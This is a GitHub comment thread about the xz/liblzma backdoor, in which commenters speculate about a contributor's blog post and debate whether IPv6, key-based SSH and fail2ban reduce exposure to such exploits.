sad day for Jia.

@christoofar
Copy link

christoofar commented Apr 4, 2024

The blog post is also not good proof. Dude sounds like he's new to the codebase, which he might really be!

He created a blog, and made one post, about his excitement of Jia's optimized memory allocator.

Which is not an optimized memory allocator. 💅

If he was excited about RISCV support going into liblzma, he would have finished the CPython binding changes and write one test to just pass a simple array to liblzma with the feature flags turned on.

If he was performance testing his board for some project, he could have forked CPython to stuff test bloat oh cool no local tests in his own fork, he shipped all the edits over... and convenience scripts (none in his fork) then called Jia and ask him to pull them down so Jia can then pin a launcher from the CPython testbed to see what's going on. Iiiiiiiii dunnnnoooo I would have left my tests in my fork and cherry pick out of that branch what I want to send to CPython if I had a board in my lap and wanted Jia's change so I can make that supercool, supercompacted whatever.

Just.... think about it.

@rdebath
Copy link

rdebath commented Apr 4, 2024

@christoofar Sshd is fine on IPv4. Your only "problem" is you can't make do with bad passwords; use keys.
If the sh**s rattling your door are bothering you include "fail2ban" to tell them to p*s off.
Or just filter your logs another way and snigger at them wasting their time rattling your door.

@0x1eef
Copy link

0x1eef commented Apr 4, 2024

@pillowtrucker

... or if you're genuinely a low iq schizophrenic.

There's no need for that, and you don't prove yourself more responsible than Z-nonymous by posting comments like that. Mental illness is not a joke, and shouldn't be used to score cheap points like that. It's not that far from racism, maybe one day you'll realize that.

@duracell
Copy link

duracell commented Apr 4, 2024

@christoofar Sshd is fine on IPv4. Your only "problem" is you can't make do with bad passwords; use keys. If the sh**s rattling your door are bothering you include "fail2ban" to tell them to p*s off. Or just filter your logs another way and snigger at them wasting their time rattling your door.

This doesn't help you with a vulnerable ssh version like this exploit or a bug.

@rdebath
Copy link

rdebath commented Apr 4, 2024

@duracell Nor does being on IPv6. This issue has a lot of hallmarks of being a very long term targeted attack. In that case the attacker knows who they want to attack and likely has a DNS lookup to point at them. If you want to reduce your attack surface filtering IPs is not really effective.

Reducing the libraries you link is ... for example don't link the obesity that is systemd. BTW: Don't think I'm trying to assign any blame here; but if you're not using systemd this why "libelogind0" exists at all and that may be a reasonable way to break the attack chain. It's one of the things that gives me a relaxed attitude to this exploit.

These are also the reasons I think this exploit is a failure, it was discovered too soon.
Thank you "Andres Freund".

@bogd
Copy link

bogd commented Apr 4, 2024

@duracell Nor does being on IPv6.

Network engineer here, so I do not have the know-how to talk about the code. But I have seen this idea of "just move to IPv6, everything will be solved there!" too many times not to reply.

For anyone thinking that IPv6 will solve the issue by just being "too difficult to scan", please think again. I still remember a 2007 presentation by Randy Bush, that explains this very well (slide 16).

Add that to what @rdebath already mentioned (this does look like something to be used for targeted attacks, and if you have a target you generally know how to reach that).

@duracell
Copy link

duracell commented Apr 4, 2024

I never said anything about ipv6, I only said fail2ban and brute-force protection will not help with such exploits.

But to say something about this, here is my point:
Your general anti-“too difficult to scan” message is bs.
Slide 16 says:

  • It is true that address space scanning will be somewhat harder
  • Ha Ha, think botnet scanning and a black market in hot space
  1. It's says “harder”! 2. 17 YEARS are gone, and where is the proof about the 2nd point?

And this is just a presentation.
You should look at the current stages of public scanning or even paper from akamai.
The truth is: Scanning is a lot, lot harder and for the whole space nearly impossible for a single person or even a normal-sized group without a lot of money. Regular scanning even more.
Of course, if it's a targeted attack and use publically known IP addresses, then it's not that much harder than ipv4. But for exploits in general on a widespread ipv6 can help to slow down mass attacks.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment